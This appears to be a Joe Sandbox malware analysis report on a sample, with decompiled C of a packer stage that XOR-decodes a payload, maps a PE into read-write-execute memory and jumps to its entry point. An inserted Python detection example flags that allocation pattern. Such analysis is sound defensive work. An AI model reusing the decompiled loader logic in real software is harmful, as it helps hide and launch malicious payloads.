                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1305f00d4ca459a5750352b2cabac9759cf2984985f5833527dee6fd78f3aa18
                        • Instruction ID: 38463184d087a17bee18e3960e375fbe367c0bf18129373c0e5f820e61b29ba4
                        • Opcode Fuzzy Hash: 1305f00d4ca459a5750352b2cabac9759cf2984985f5833527dee6fd78f3aa18
                        • Instruction Fuzzy Hash: CBB092B168D2824BC3416320082C9A6AB142BB6310B6980AFD0C00A18ADA584931D3A7
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d99057a546bda6ba5ce5ce38362ae21d8058b2126ef7702eadda58165c30613b
                        • Instruction ID: fa5d629e33415fb507229818d6247b51a0344aa6dbbde97adf3f1cb1cac36da1
                        • Opcode Fuzzy Hash: d99057a546bda6ba5ce5ce38362ae21d8058b2126ef7702eadda58165c30613b
                        • Instruction Fuzzy Hash: 76F0C470A11609EFDB14CF95C181AA9BBB4EB14719F2C819AE9059B351D374DE42DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 63%
                        			E00CD1133(void* __esi, long* _a4) {
                        				signed int _v8;
                        				long _v12;
                        				long _v16;
                        				void* _t8;
                        				int _t26;
                        				void* _t27;
                        				void* _t28;
                        				void* _t30;
                        				signed int _t32;
                        				void* _t34;
                        				void* _t39;
                        				long* _t42;
                        				long _t45;
                        				void* _t46;
                        
                        				_t46 = __esi; // payload descriptor: +0x10 XOR key, +0x14 value passed to E00CD12EB, +0x18 size, +0x1c data
                        				if(__esi == 0) {
                        					L9:
                        					return 0;
                        				}
                        				_t45 =  *(__esi + 0x18); // size of the encoded blob
                        				if(_t45 == 0) {
                        					goto L9;
                        				}
                        				_v16 = _v16 & 0x00000000; // receives the old page protection
                        				_v8 =  *((intOrPtr*)(__esi + 0x10)); // XOR key
                        				_v12 = _t45 << 2; // destination buffer is four times the encoded size
                        				_t8 = _t46 + 0x1c; // encoded blob follows the descriptor
                        				_t34 = _t8;
                        				// 0xffffffff = current process, 0x40 = PAGE_EXECUTE_READWRITE
                        				_t26 = VirtualProtectEx(0xffffffff, _t34, _t45, 0x40,  &_v16); // executed
                        				if(_t26 == 0) {
                        					goto L9;
                        				}
                        				_t27 = 0;
                        				// Decode the blob in place with the XOR key
                        				if(_t45 != 0) {
                        					do {
                        						 *(_t27 + _t34) =  *(_t27 + _t34) ^ _v8;
                        						_t27 = _t27 + 1;
                        					} while (_t27 < _t45);
                        				}
                        				// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                        				_t28 = VirtualAllocEx(0xffffffff, 0, _v12, 0x3000, 0x40); // executed
                        				_v8 = _t28;
                        				if(_t28 == 0) {
                        					goto L9;
                        				}
                        				// Expand the decoded blob into the new buffer; 0xffffffff signals failure
                        				_t30 = E00CD12EB(_t34, _t45, _t28,  *((intOrPtr*)(_t46 + 0x14)) + 1);
                        				_pop(_t39);
                        				if(_t30 == 0xffffffff) {
                        					// Arguments for the VirtualFreeEx at L8: (buffer, 0, 0x8000 = MEM_RELEASE)
                        					_push(0x8000);
                        					_push(0);
                        					_push(_v8);
                        					L8:
                        					VirtualFreeEx(0xffffffff, ??, ??, ??); // remaining arguments come from the pushes above
                        					goto L9;
                        				}
                        				E00CD1863(_t39, _t34, 0, _t45); // overwrites the original blob (likely a memset to 0)
                        				_t32 = _v8;
                        				// Release the buffer unless it starts with 'MZ' and e_lfanew points at a 'PE' signature
                        				if( *_t32 != 0x5a4d ||  *((intOrPtr*)(_t32 +  *((intOrPtr*)(_t32 + 0x3c)))) != 0x4550) {
                        					_push(0x8000);
                        					_push(0);
                        					_push(_t32);
                        					goto L8;
                        				}
                        				_t42 = _a4;
                        				if(_t42 != 0) {
                        					 *_t42 = _v12; // report the allocated size to the caller
                        					return _t32;
                        				}
                        				return _t32;
                        			}

                        APIs
                        • VirtualProtectEx.KERNEL32(000000FF,0000001C,?,00000040,00000000), ref: 00CD1169
                        • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000040), ref: 00CD1192
                        • VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000), ref: 00CD11C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFreeProtect
                        • String ID:
                        • API String ID: 267585107-0
                        • Opcode ID: 990109e77be4d0b286c64ea921f878dea12f27511afee615773ce33a07c5c212
                        • Instruction ID: 98736292987d57dd134422cc8e7accfa764f62993a026fc40ac91fd432db696e
                        • Opcode Fuzzy Hash: 990109e77be4d0b286c64ea921f878dea12f27511afee615773ce33a07c5c212
                        • Instruction Fuzzy Hash: 0521C775600204BBDB219B65CC41F6EB7F6AB45B20F28475AEB21AB3D0DA70EA04DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00CD16E9(void* __ebx, void* __ecx, intOrPtr _a4) {
                        				void* __esi;
                        				void* _t9;
                        				int _t12;
                        				long _t16;
                        				void* _t21;
                        				void* _t24;
                        				intOrPtr _t28;
                        
                        				_t21 = __ecx;
                        				if(__ebx == 0 || _a4 == 0) { // __ebx = decoded PE image, _a4 = its size
                        					return _t9;
                        				} else {
                        					_t28 =  *((intOrPtr*)(__ebx + 0x3c)) + __ebx; // IMAGE_NT_HEADERS via e_lfanew
                        					// Allocate OptionalHeader.SizeOfImage (NT + 0x50) plus 0x20 bytes; 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                        					_t12 = VirtualAllocEx(0xffffffff, 0,  *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x3c)) + __ebx + 0x50)) + 0x20, 0x3000, 0x40); // executed
                        					_t24 = _t12;
                        					if(_t24 != 0) {
                        						E00CD181D(_t21, _t24, __ebx,  *((intOrPtr*)(_t28 + 0x54))); // NT + 0x54 = OptionalHeader.SizeOfHeaders
                        						E00CD162B(_t28, _t24, __ebx);
                        						E00CD1863(_t21, __ebx, 0, _a4); // overwrites the decoded source image
                        						_t16 = E00CD176E(_t24, _t24);
                        						if(_t16 != 0) {
                        							// NT + 0x28 = OptionalHeader.AddressOfEntryPoint, rebased onto the new allocation
                        							_t12 = E00CD1698(_t21, _t24,  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0x3c)) + _t24 + 0x28)) + _t24); // executed
                        						} else {
                        							_t12 = VirtualFreeEx(0xffffffff, _t24, _t16, 0x8000); // 0x8000 = MEM_RELEASE
                        						}
                        					}
                        					return _t12;
                        				}
                        			}

                        APIs
                        • VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000040,?,00000000,?,00CD1250,00000000), ref: 00CD170F
                        • VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000), ref: 00CD174E
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: e2d6f7f08057f57509906cacaeb13d490a36df1d81ccfc2748c408537e1ea622
                        • Instruction ID: c1aca07a4f36948bdb5166ba687ac84d02d40d1d48081c0898821ba70d90a8fe
                        • Opcode Fuzzy Hash: e2d6f7f08057f57509906cacaeb13d490a36df1d81ccfc2748c408537e1ea622
                        • Instruction Fuzzy Hash: 1C01F7736003007BE7616A559DC5F7B37ACEB94B24F1D011BFF24A63D1CA60E840A764
                        Uniqueness

                        Uniqueness Score: -1.00%
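The decompiled function above is a small in-process PE loader: it reads `e_lfanew` at image offset 0x3c, takes `SizeOfImage` from NT-header offset 0x50 (plus 0x20 bytes), allocates that much with `VirtualAllocEx` using handle 0xffffffff (the current-process pseudo handle, so the target is the sample itself, not another process), `MEM_COMMIT|MEM_RESERVE` (0x3000) and `PAGE_EXECUTE_READWRITE` (0x40), copies the image in (the `+0x54` argument is consistent with `SizeOfHeaders`), and on success jumps to `AddressOfEntryPoint` at NT-header offset 0x28; on failure it releases the block with `MEM_RELEASE` (0x8000). The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses those same header fields by raw offset from a constructed minimal PE32 header and decodes the allocation arguments the report lists into the self-injecting RWX pattern an analyst would hunt for. Function names, the size tolerance in `classify_alloc` and the sample header bytes are assumptions for illustration.

```python
"""Added example (not from the Joe Sandbox report or the analysed sample): read the
PE header fields a manual-map loader dereferences by raw offset and flag the
VirtualAllocEx argument pattern (self handle, reserve+commit, RWX, SizeOfImage)."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D            # 'MZ'
IMAGE_NT_SIGNATURE = 0x00004550         # 'PE\0\0'
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
MEM_RELEASE = 0x8000                    # flag used on the loader's failure path
PAGE_EXECUTE_READWRITE = 0x40
CURRENT_PROCESS_PSEUDO_HANDLE = 0xFFFFFFFF   # GetCurrentProcess() in a 32-bit process


def parse_loader_fields(image: bytes) -> dict:
    """Return the header fields the decompiled loader reads by raw offset.

    *(image+0x3c) locates the NT headers; from there +0x28 is AddressOfEntryPoint,
    +0x50 is SizeOfImage and +0x54 is SizeOfHeaders.  The offsets are identical for
    PE32 and PE32+ because the 8-byte ImageBase in PE32+ absorbs PE32's BaseOfData.
    """
    if len(image) < 0x40 or struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    # Need Signature + FileHeader + the first 0x58 bytes of the OptionalHeader.
    if e_lfanew + 0x18 + 0x58 > len(image):
        raise ValueError("e_lfanew points outside the buffer")
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature at e_lfanew")
    machine, nsections = struct.unpack_from("<HH", image, e_lfanew + 0x04)
    magic = struct.unpack_from("<H", image, e_lfanew + 0x18)[0]
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 0x28)[0]
    size_of_image = struct.unpack_from("<I", image, e_lfanew + 0x50)[0]
    size_of_headers = struct.unpack_from("<I", image, e_lfanew + 0x54)[0]
    if entry_rva >= size_of_image:
        raise ValueError("entry point lies outside SizeOfImage")
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": nsections,
        "pe32plus": magic == 0x20B,
        "entry_rva": entry_rva,
        "size_of_image": size_of_image,
        "size_of_headers": size_of_headers,
        "alloc_size_requested": size_of_image + 0x20,   # the sample adds 0x20 bytes
    }


def classify_alloc(hprocess: int, size: int, alloc_type: int, protect: int,
                   size_of_image: int) -> dict:
    """Decode VirtualAllocEx arguments as the report prints them and flag the
    self-mapping pattern: reserve+commit of about SizeOfImage bytes, writable and
    executable at once, into the caller's own process."""
    in_self = hprocess == CURRENT_PROCESS_PSEUDO_HANDLE
    rwx = protect == PAGE_EXECUTE_READWRITE
    reserve_commit = (alloc_type & (MEM_COMMIT | MEM_RESERVE)) == (MEM_COMMIT | MEM_RESERVE)
    # Tolerance of one page above SizeOfImage is an assumption for this example.
    sized_like_image = size_of_image <= size <= size_of_image + 0x1000
    return {
        "target_is_self": in_self,
        "rwx": rwx,
        "reserve_and_commit": reserve_commit,
        "sized_like_image": sized_like_image,
        "manual_map_suspect": in_self and rwx and reserve_commit and sized_like_image,
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 header for offline testing (not the analysed file)."""
    buf = bytearray(0x200)
    struct.pack_into("<H", buf, 0x00, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", buf, 0x3C, 0x80)                 # e_lfanew
    nt = 0x80
    struct.pack_into("<I", buf, nt, IMAGE_NT_SIGNATURE)
    struct.pack_into("<HH", buf, nt + 0x04, 0x014C, 1)      # IMAGE_FILE_MACHINE_I386, 1 section
    struct.pack_into("<H", buf, nt + 0x14, 0xE0)            # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", buf, nt + 0x18, 0x10B)           # Magic = PE32
    struct.pack_into("<I", buf, nt + 0x28, 0x1000)          # AddressOfEntryPoint
    struct.pack_into("<I", buf, nt + 0x50, 0x3000)          # SizeOfImage
    struct.pack_into("<I", buf, nt + 0x54, 0x200)           # SizeOfHeaders
    return bytes(buf)


if __name__ == "__main__":
    fields = parse_loader_fields(build_sample_pe())
    verdict = classify_alloc(0xFFFFFFFF, fields["alloc_size_requested"], 0x3000, 0x40,
                             fields["size_of_image"])
    print(fields)
    print(verdict)
```

Feeding the report's own argument list (handle 000000FF rendered as 0xFFFFFFFF, type 00003000, protect 00000040) into `classify_alloc` yields `manual_map_suspect: True`; the same size and type with a real remote handle and `PAGE_READWRITE` does not, which is the distinction between this self-loading stage and the remote process-hollowing behaviour the report flags elsewhere.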

                        Control-flow Graph

                        Single block 2771fba-2771fcc: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 2771ba2-2771bb4: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 277126c-277127e: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 833478d482a7b43204bbbe238d27421b16e52cae6c99a7ea0f44efd2c3c9bdf3
                        • Instruction ID: 1ba7af1aba9965ef21294bbc980e45405888e9775d63a3e6e8a890e76fa3ddbe
                        • Opcode Fuzzy Hash: 833478d482a7b43204bbbe238d27421b16e52cae6c99a7ea0f44efd2c3c9bdf3
                        • Instruction Fuzzy Hash: D4B0927044E2818BC342633108298A26B142AAA2203AAC1EED0C40A55AC69C4926DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 27727ea-27727fc: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: aa513a66151f21651e0a99563f16ae0a9e7f015dc53f313c8b3105b8c6a60f41
                        • Instruction ID: 2717141006914902d82831632c63fb57cbdd18c9338ab7ab102fbcc3b9ad98cb
                        • Opcode Fuzzy Hash: aa513a66151f21651e0a99563f16ae0a9e7f015dc53f313c8b3105b8c6a60f41
                        • Instruction Fuzzy Hash: 6AB092B549A2824BC3816720082C9A66B541BE5220B79C0AFD0C40A18ACA5845B5D3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 2771ca8-2771cba: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 2771996-27719a8: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block 2770f5a-2770f6c: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305124159.0000000002770000.00000040.00001000.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2770000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction ID: 13d8455f11edab5e26112e1f76ce15454a3e06d171b0115a56dfd79d7043cd27
                        • Opcode Fuzzy Hash: a6bdf01ca1c0c5a43ad605715ddbe7bd6d0429d503267bc2b4746c944573b98b
                        • Instruction Fuzzy Hash: 75B0927008A2865BC34167200829AA36B552BA1210B6985AED0C00A14B87584675E7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:10.5%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:1
                        Total number of Limit Nodes:0
                        Single node e81996: LdrInitializeThunk

                        Callgraph

                        Control-flow Graph

                        Single block e81ca8-e81cba: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction ID: 276e05382c44e754f64a631682c2cf0a86faafde1a6fa7e7aeff9baa436309a7
                        • Opcode Fuzzy Hash: dcb7c3af475a23df02debab6b573447acc9632e9873d927ffe8e15c59b0c6522
                        • Instruction Fuzzy Hash: 1BB0927008A2D14BC342A3204828AA77B542BA2211B69C0EAD0C02A14A86584625E3A3
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block e81ba2-e81bb4: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction ID: 6e447e2aab31238f52af9227f51ec9419e211fef2ea0690e6f86d454c0306d03
                        • Opcode Fuzzy Hash: 6443a9b9c20338df526d967f01ba007e1c2c7c349fe7d139e25d763d52dc77a8
                        • Instruction Fuzzy Hash: 70B0927008A2825BC342672009388A2BB142BA231176DC0EAD0C00A14A8A584665F3A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block e81fba-e81fcc: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction ID: 88293d452c237b35b5d788c3fe7e5d6bf4017d7a5827ca68aa0277ca53bbf94f
                        • Opcode Fuzzy Hash: d09c6d336daddccd9ad0fb98a292e4fd4d6995d8b64d3c54430dff6c08c5ba09
                        • Instruction Fuzzy Hash: 04B0927008A2C24BC30157200C28AA77B542BA1312B6981AED0C00A55A87684561E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        Single block e81996-e819a8: LdrInitializeThunk
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.306149574.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_e80000_yvneslhpc.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction ID: e6cd4b975672edc97eaad6a8d3891c608aeb046747e8cb31da1c1ec735a207a7
                        • Opcode Fuzzy Hash: 791634668ed0db82ba60d2b2caeb12b8b239b92cb31d5dfc98e587fe531684f9
                        • Instruction Fuzzy Hash: C5B092B008A2C18FC34263204C2ACA37B242EA222136A81EAD0C40B15A865C4939E7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:14.2%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:14.1%
                        Total number of Nodes:1117
                        Total number of Limit Nodes:131
                        execution_graph 26100 2878b84 18 API calls 24710 2883a8d RegCreateKeyExW RegCloseKey 25039 288489c 25042 28848d5 25039->25042 25041 28848c6 25043 28848ec 25042->25043 25044 28848f7 25043->25044 25048 28661e9 25043->25048 25044->25041 25049 28661f8 25048->25049 25091 2866202 25049->25091 25051 2866200 25051->25044 25052 2884963 25051->25052 25053 288496d 25052->25053 25126 2884c84 25053->25126 25056 288499b RtlAddVectoredExceptionHandler 25057 28849ad 25056->25057 25130 2865774 25057->25130 25060 28849c0 25135 286e06b 25060->25135 25061 28849ee 25062 2884a36 25061->25062 25181 2865b4a 25061->25181 25189 286fc3e 25062->25189 25065 2884a5b 25066 2884a87 25065->25066 25067 288383b 3 API calls 25065->25067 25068 2884aa6 25066->25068 25069 2865e00 3 API calls 25066->25069 25067->25066 25201 2865e00 25068->25201 25069->25068 25071 2884ac6 25218 287fd11 25071->25218 25074 2884aed 25075 2884af6 25074->25075 25221 287f56d 25074->25221 25077 2865e00 3 API calls 25075->25077 25078 2884b0b Sleep 25077->25078 25238 2884bca 25078->25238 25081 2884b23 25247 2884cbc 25081->25247 25083 2884b28 25084 2884b65 25083->25084 25087 2884b3b 25083->25087 25089 2884b63 25084->25089 25278 2880a42 RtlFreeHeap 25084->25278 25086 2884bb8 25086->25044 25258 28707d7 25087->25258 25279 286e4ff RtlFreeHeap 25089->25279 25092 286622b 25091->25092 25110 2885150 25092->25110 25094 286625d 25095 2885150 GetPEB 25094->25095 25096 286626c 25095->25096 25105 2866283 25096->25105 25115 2884f0a 25096->25115 25098 28662a0 25099 2884f0a LdrGetProcedureAddress 25098->25099 25098->25105 25100 28662e2 25099->25100 25101 286630e SetErrorMode 25100->25101 25100->25105 25107 2866325 25101->25107 25102 2866422 25119 28664bf 25102->25119 25103 286171c RtlFreeHeap 25103->25107 25105->25051 25106 2866374 LoadLibraryW 25106->25107 25107->25102 25107->25103 25107->25105 25107->25106 25108 2884f0a LdrGetProcedureAddress 25107->25108 25109 28617e4 RtlFreeHeap 25107->25109 25108->25107 25109->25107 
25111 288515d 25110->25111 25112 2885161 25110->25112 25111->25094 25113 28851a9 GetPEB 25112->25113 25114 28851c3 25112->25114 25113->25114 25114->25094 25116 2884f52 25115->25116 25117 2884f1d 25115->25117 25116->25098 25117->25116 25118 2885096 LdrGetProcedureAddress 25117->25118 25118->25117 25120 28664ee 25119->25120 25121 28665f5 LoadLibraryA 25120->25121 25122 286662f LoadLibraryA 25121->25122 25125 2866609 25121->25125 25123 2866656 25122->25123 25124 2866643 GetProcAddress 25122->25124 25123->25105 25124->25123 25125->25122 25128 2884c92 25126->25128 25127 288497a 25127->25056 25127->25057 25128->25127 25280 2862240 RtlFreeHeap 25128->25280 25131 2865778 25130->25131 25132 28617e4 RtlFreeHeap 25131->25132 25134 28657ab 25131->25134 25133 28657df 25132->25133 25133->25060 25134->25060 25136 286e099 25135->25136 25281 286db20 25136->25281 25138 286e0a9 25153 286e0ad 25138->25153 25297 286ddff 25138->25297 25140 286e0e2 25141 286ddff 20 API calls 25140->25141 25143 286e0f0 25140->25143 25141->25143 25152 286e12e 25143->25152 25143->25153 25326 28671eb 25143->25326 25144 286e261 Sleep 25145 286e269 25144->25145 25146 286ddff 20 API calls 25145->25146 25149 286e271 25146->25149 25147 286e192 25147->25144 25147->25145 25147->25153 25150 286ddff 20 API calls 25149->25150 25154 286e27f 25149->25154 25150->25154 25151 286e2b1 25155 286e2d3 NtQueryInformationProcess 25151->25155 25162 286e392 25151->25162 25152->25153 25330 286d4dc 25152->25330 25153->25061 25154->25151 25156 2863d40 3 API calls 25154->25156 25159 286e2f4 25155->25159 25157 286e2a5 25156->25157 25158 2863d40 3 API calls 25157->25158 25158->25151 25342 286ff36 25159->25342 25164 288383b 3 API calls 25162->25164 25167 286e402 25162->25167 25164->25167 25173 286e41b 25167->25173 25385 286e03f 11 API calls 25167->25385 25168 286e45b 25170 286e46c 25168->25170 25387 286e03f 11 API calls 25168->25387 25172 286ddff 20 API calls 25170->25172 25176 286e485 25172->25176 25173->25168 25386 2877d31 16 API calls 